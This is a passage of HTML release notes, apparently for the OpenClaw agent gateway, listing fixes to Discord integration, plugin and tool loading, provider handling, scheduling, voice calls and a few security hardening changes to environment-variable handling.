<p>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</p>
</li>
<li>
<p>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</p>
</li>
<li>
<p>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</p>
</li>
<li>
<p>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</p>
</li>
<li>
<p>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</p>
</li>
<li>
<p>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</p>
</li>
<li>
<p>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</p>
</li>
<li>
<p>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</p>
</li>
<li>
<p>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</p>
</li>
<li>
<p>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</p>
</li>
<li>
<p>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Agents/tools: skip unavailable media generation and PDF tool factories from the live reply path when Gateway metadata and the active auth store prove no configured provider can back them, while keeping explicit config and auth-backed providers on the normal factory path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: reuse the Gateway metadata startup plan when ensuring reply runtime plugins are loaded, so live agent turns do not broad-load plugin runtimes after the Gateway already scoped startup activation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: delegate scoped reply runtime registry reuse to the plugin loader cache-key compatibility checks, so config changes with the same startup plugin ids cannot keep stale runtime hooks or tools active. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: let compatible wider plugin registries satisfy scoped reply runtime requests when they already contain the requested plugins, avoiding redundant runtime loading without bypassing loader cache-key freshness checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: validate agent model allowlists against manifest model catalog metadata during reply startup, avoiding broad provider runtime catalog loading before the agent run lane starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: keep allowlisted configured model thinking metadata available when manifest catalog rows are absent, so explicit high-reasoning levels remain valid for custom configured models. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: preserve plugin-declared config-only generation providers such as local Comfy workflows during reply tool pre-gating, and share manifest auth/config availability checks between the planner and final tool factories. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep Comfy generation tools visible from legacy local workflow config and cloud API-key config when no Gateway metadata snapshot is active, using plugin-declared manifest signals instead of loading provider runtimes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: route media and generation capability lookups through the Gateway plugin metadata snapshot during reply tool registration, avoiding repeated manifest registry reloads on the live reply path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: let plugins declare media generation auth aliases and base-url guards in manifests, preserving OpenAI Codex OAuth image generation availability without core-owned provider special cases. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: reuse the auth profile store already loaded for the active run when deciding media and generation tool availability, avoiding repeated provider-auth runtime discovery during reply startup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep image, video, and music generation tool registration on manifest/auth control-plane checks instead of loading runtime provider registries during reply startup, reducing live-path tool-prep blocking while leaving provider runtime resolution for execution and list actions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</p>
</li>
<li>
<p>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</p>
</li>
<li>
<p>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</p>
</li>
<li>
<p>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</p>
</li>
<li>
<p>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</p>
</li>
<li>
<p>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</p>
</li>
<li>
<p>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</p>
</li>
<li>
<p>Discord/voice: leave Discord voice off for text-only configs unless <code>channels.discord.voice</code> is explicitly configured, avoiding default <code>GuildVoiceStates</code> traffic and idle gateway CPU pressure for bots that do not use <code>/vc</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>. Thanks @sanchezm86 and @SecureCloudProjO.</p>
</li>
<li>
<p>Discord/voice: rerun configured voice auto-join after Discord gateway RESUMED events and ignore already-destroyed stale voice connections during reconnect cleanup, so health-monitor account restarts can rejoin configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>. Thanks @liz709.</p>
</li>
<li>
<p>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: lengthen the default voice join Ready wait, add configurable <code>voice.connectTimeoutMs</code>/<code>voice.reconnectGraceMs</code>, and warn before destroying unrecovered disconnected sessions so slow Discord voice handshakes and reconnects no longer fail silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @darealgege, @kzicherman, and @ayochim.</p>
</li>
<li>
<p>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</p>
</li>
<li>
<p>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</p>
</li>
<li>
<p>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: merge configured media-understanding providers such as Deepgram into partial active provider registries, so follow-up voice turns keep transcribing after another media plugin is already active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>. Thanks @OneMintJulep.</p>
</li>
<li>
